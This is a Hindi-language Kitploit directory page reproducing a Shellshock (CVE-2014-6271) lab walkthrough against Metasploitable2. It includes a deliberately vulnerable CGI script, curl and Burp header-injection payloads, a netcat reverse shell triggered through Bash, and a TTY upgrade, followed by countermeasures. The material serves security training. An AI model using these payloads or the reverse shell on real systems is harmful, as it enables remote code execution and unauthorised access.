Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/drhaitham/cve-2014-6271-shellshock-
भेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubdrhaitham/cve-2014-6271-shellshock-

CVE-2014-6271-Shellshock-

CVE-2014-6271 (Shellshock) के लिए एक पूर्ण, आधुनिक प्रदर्शन लैब, जिसमें आर्किटेक्चर, शोषण चरण, Burp Suite उपयोग, रिवर्स शेल, प्रतिवाद और पूर्ण कमांड चीट-शीट शामिल हैं।

रिपॉजिटरी देखें
109 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शेलशॉक (CVE-2014-6271) का शोषण: एक पूर्ण, आधुनिक प्रदर्शन प्रयोगशाला

शेलशॉक (CVE-2014-6271) अब तक खोजी गई सबसे प्रभावशाली रिमोट कोड निष्पादन कमजोरियों में से एक है। यह दोष Bash को प्रभावित करता है और हमलावरों को पर्यावरण चरों में तैयार पेलोड इंजेक्ट करके मनमाने आदेशों को निष्पादित करने की अनुमति देता है।

यह मार्गदर्शिका निम्नलिखित का उपयोग करके एक पूर्ण, प्रतिलिपि प्रस्तुत करने योग्य प्रदर्शन प्रदान करती है:

  • काली लिनक्स (हमलावर)
  • मेटास्प्लोइटेबल2 (लक्ष्य)
  • curl, Burp Suite, Netcat
  • मैन्युअल रूप से बनाई गई Bash-आधारित CGI स्क्रिप्ट

यह शिक्षण, अनुसंधान, प्रशिक्षण और सामान्य साइबर सुरक्षा जागरूकता के लिए डिज़ाइन किया गया है।


📌 विषय-सूची

  1. प्रयोगशाला वास्तुकला
  2. संवेदनशील CGI स्क्रिप्ट बनाना
  3. शेलशॉक कमजोरी को समझना
  4. curl के साथ शेलशॉक का शोषण
  5. Burp Suite के साथ शेलशॉक का शोषण
  6. शेलशॉक के माध्यम से रिवर्स शेल
  7. पूर्णतः इंटरैक्टिव TTY में अपग्रेड करना
  8. हमला श्रृंखला आरेख
  9. स्क्रीनशॉट गैलरी
  10. प्रतिउपाय
  11. चीट शीट (सभी कमांड)
  12. Metasploit का उपयोग करके शेलशॉक का शोषण
  13. निष्कर्ष

1. प्रयोगशाला वास्तुकला

घटकभूमिकाOSआईपी पतामुख्य सेवाएँ
काली लिनक्सहमलावरKali Linux (नवीनतम)192.168.1.4curl, Burp Suite, Netcat
मेटास्प्लोइटेबल2लक्ष्य संवेदनशील सर्वरUbuntu Linux (MSF2)192.168.1.5Apache 2.2, CGI स्क्रिप्ट्स, Bash
Apache mod_cgiस्क्रिप्ट निष्पादनMSF2 पर चलता हैn/aCGI के माध्यम से Bash को उजागर करता है
shellshock.shसंवेदनशील प्रवेश बिंदुBash CGIn/aपर्यावरण चर प्रदर्शित करता है

यह सरल दो-नोड सेटअप औद्योगिक और IoT सिस्टम में अभी भी मौजूद कई विरासत परिनियोजनों को दर्शाता है।


2. संवेदनशील CGI स्क्रिप्ट बनाना

Metasploitable2 पर:

sudo su
cd /usr/lib/cgi-bin/

cat << 'EOF' > shellshock.sh
#!/bin/bash
echo "Content-type: text/html"
echo
echo "<pre>"
env
echo "</pre>"
EOF

chmod +x shellshock.sh
a2enmod cgi
service apache2 restart

Kali से स्क्रिप्ट का परीक्षण करें:

curl http://192.168.1.5/cgi-bin/shellshock.sh

आपको पर्यावरण चर प्रदर्शित होते हुए देखना चाहिए।


3. शेलशॉक कमजोरी को समझना

शेलशॉक तब होता है जब Bash फ़ंक्शन परिभाषाओं से मिलते-जुलते पर्यावरण चरों का गलत तरीके से पार्स करता है।

एक दुर्भावनापूर्ण चर जैसे:

() { :; }; /bin/bash -c "id"

Bash को फ़ंक्शन परिभाषा के बाद कमांड निष्पादित करने का कारण बनेगा—भले ही फ़ंक्शन स्वयं कभी आह्वान न किया गया हो।

CGI अनुप्रयोग विशेष रूप से संवेदनशील होते हैं क्योंकि HTTP हेडर स्वचालित रूप से पर्यावरण चर के रूप में स्क्रिप्ट को पास हो जाते हैं।


4. curl के साथ शेलशॉक का शोषण

curl -H 'User-Agent: () { :; }; echo; echo Vulnerable; /bin/bash -c "id"' \
http://192.168.1.5/cgi-bin/shellshock.sh

आउटपुट में शामिल होना चाहिए:

Vulnerable
uid=33(www-data)

यह रिमोट कोड निष्पादन की पुष्टि करता है।


5. Burp Suite के साथ शेलशॉक का शोषण

5.1 सामान्य अनुरोध भेजें

यहाँ जाएँ:

http://192.168.1.5/cgi-bin/shellshock.sh

अनुरोध को Repeater पर भेजें।

5.2 शेलशॉक पेलोड इंजेक्ट करें

User-Agent हेडर को इससे बदलें:

User-Agent: () { :; }; echo; echo BurpTest; /bin/bash -c "id"

5.3 प्रतिक्रिया

आपको देखना चाहिए:

BurpTest
uid=33(www-data)

Burp Suite दृश्य और शैक्षिक तरीके से कमजोरी की पुष्टि करता है।


6. शेलशॉक के माध्यम से रिवर्स शेल

Kali पर सुनने वाला प्रारंभ करें:

nc -lvnp 4444

CGI स्क्रिप्ट के माध्यम से रिवर्स शेल ट्रिगर करें:

curl -H 'User-Agent: () { :; }; /bin/bash -c "nc 192.168.1.4 4444 -e /bin/bash"' \
http://192.168.1.5/cgi-bin/shellshock.sh

Kali को एक शेल वापस जुड़ जाएगा।


7. पूर्णतः इंटरैक्टिव TTY में अपग्रेड करना

रिवर्स शेल के अंदर:

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

सत्र को निलंबित करें:

Ctrl + Z

Kali पर:

stty raw -echo; fg

Enter दबाएँ।

अब आपके पास है:

  • टैब पूर्णता
  • तीर कुंजियाँ
  • जॉब नियंत्रण
  • पूर्ण इंटरैक्टिव Bash

8. हमला श्रृंखला आरेख

          ┌────────────────────────┐
          │     हमलावर (काली)      │
          │      192.168.1.4       │
          └───────────┬────────────┘
                      │
     1. दुर्भावनापूर्ण HTTP हेडर (शेलशॉक)
                      │
                      ▼
        ┌──────────────────────────┐
        │ Apache वेब सर्वर (CGI)   │
        │     192.168.1.5          │
        └───────────┬──────────────┘
                    │
   2. हेडर → CGI पर्यावरण चर
                    │
                    ▼
      ┌──────────────────────────┐
      │     Bash (संवेदनशील)     │
      └───────────┬──────────────┘
                  │
      3. इंजेक्टेड कमांड निष्पादित होता है
                  │
                  ▼
        ┌─────────────────────────┐
        │  www-data शेल एक्सेस    │
        └───────────┬─────────────┘
                    │
        4. रिवर्स शेल → काली
                    │
                    ▼
      ┌──────────────────────────┐
      │ पूर्ण इंटरैक्टिव TTY     │
      └──────────────────────────┘

9. स्क्रीनशॉट गैलरी

हमले के प्रमुख चरणों का एक दृश्य वॉकथ्रू।

विवरणछवि
Nmap स्कैन + Shellshock परीक्षण आउटपुट
Burp Suite – प्रारंभिक Shellshock अनुरोध
Burp Suite – पेलोड / हेडर इंजेक्शन
Kali पर प्राप्त रिवर्स शेल (nc)

10. प्रतिउपाय

✔ 1. Bash को अपग्रेड करें

उस संस्करण पर पैच लागू करें जो फ़ंक्शन पार्सिंग को सही ढंग से संभालता है।

✔ 2. CGI को अक्षम करें

विरासत CGI अनावश्यक प्रणालीगत जोखिम का परिचय देता है।

✔ 3. HTTP हेडर को स्वच्छ करें

संदिग्ध पैटर्न जैसे कि:

() { :; };

को हटाएँ।

✔ 4. न्यूनतम विशेषाधिकार का उपयोग करें

वेब सर्वर उपयोगकर्ता (www-data) की अनुमतियों को प्रतिबंधित करें।

✔ 5. आउटबाउंड कनेक्शन प्रतिबंध

रिवर्स शेल और डेटा निष्कासन को रोकता है।

✔ 6. वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें

आधुनिक WAF हस्ताक्षर शेलशॉक का तुरंत पता लगाते हैं।

✔ 7. SELinux / AppArmor सक्षम करें

Bash प्रक्रियाओं को सीमित करता है और अनावश्यक व्यवहार को अवरुद्ध करता है।

✔ 8. नियमित कमजोरी स्कैन चलाएँ

निम्नलिखित टूल का उपयोग करें:

  • Nessus
  • OpenVAS
  • Nikto
  • Nmap NSE (http-shellshock.nse)

11. चीट शीट (सभी कमांड)

लक्ष्य सेटअप

टूल डाउनलोड करें